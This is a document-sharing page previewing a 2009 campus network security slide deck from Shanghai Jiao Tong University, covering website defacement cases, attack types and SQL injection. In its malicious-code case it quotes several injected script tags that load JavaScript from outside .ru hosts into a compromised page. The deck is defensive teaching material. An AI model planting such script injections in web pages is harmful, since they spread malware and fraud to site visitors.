校园网安全分析(上海交通大学 姜开达博士).pdf

校园网安全分析(上海交通大学 姜开达博士).pdf

  1. 1、本文档共89页,可阅读全部内容。
  2. 2、有哪些信誉好的足球投注网站(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
  3. 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载
  4. 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
查看更多
校园网安全分析(上海交通大学 姜开达博士)

校园网安全分析 上海交通大学网络信息中心 姜开达 2009.4.26 主要内容 Web网站安全和服务器基础安全配置 校园网常见安全问题和应对处理 网络管理中的安全配置 Web 网站安全 Web网站-黑客攻击的首选目标 攻击方式和案例分析 校园网内网站安全状况 Web服务器安全配置 Web 网站遭受攻击的后果 网页被篡改有损学校形象; 网页被别有用心的黑客插入恶意或有害的内容,将造成 很大负面影响; 运行在网站后台的数据库一旦被黑客攻破,将会造成敏 感数据泄漏、失窃或遭受毁灭性破坏,带来很大的麻烦 或遭受相当的经济损失; 网站服务器被黑客掌控,成为散布病毒、木马、恶意软 件等据点,或者被黑客用作攻击他人的跳板。 近几年中国大陆网站被篡改情况 国家计算机网络应急技术处理协调中心 CNCERT/CC2007年网络安全工作报告 CNCERT/CC监测到发现中国大陆被篡改网站的数量近年来增长迅猛。2007年, CNCERT/CC监测到中国大陆被篡改网站总数累积达61228个,是2006年的2.5倍, 2003年的53倍。 记录被篡改网页的国外安全网站 有记录可查的 网站被篡改2580 次 存在恶意代码的 网站 浏览器访问含恶意代码网站的提示 Google 的Safe Browsing API 2008 年8 月24 日清华网站遭黑客攻击 2008 年9 月26 日北大网站又被黑客篡改 2009 年4 月25 日我校医学院网站被篡改 上海交大网站被入侵 2006年6月《黑客防 线》杂志第06期公布 “手工入侵上海交通大 学”一文,列出多个校 内存在安全隐患的网 站,并描述了对校内几 个网站的攻击过程。 复旦大学网站被入侵 攻击类型(篡改首页) 攻击类型(篡改内容) 友情提醒 恶意增加内容 攻击类型(上传后门木马) 攻击类型(网络欺诈) Phishing 攻击类型(恶意代码) /Shownews.asp?id=21 包含以下恶意代码 script src=/ngg.js/script script src=http://www.kjwd.ru/ngg.js/script script src=http://www.oics.ru/ngg.js/script script src=http://www.ujnc.ru/js.js/script script src=http://www.nbh3.ru/js.js/script 可以被利用弹广告,骗点击率,传播木马病毒等。 垃圾广告和恶意评论信息 常出现在论坛,留言版,文章评论,博客 缺乏审核的帖子会带来严重后果 Web 应用三大主要安全漏洞 SQL注入攻击(SQL injection) Internet上最常见、最流行的应用层攻击,主要漏洞存在于用ASP, ASP.NET, PHP, JSP, CGI 脚本语言编写的动态网页。Web 应用系统

文档评论(0)

dajuhyy + 关注
实名认证
内容提供者

该用户很懒,什么也没介绍

1亿VIP精品文档

相关文档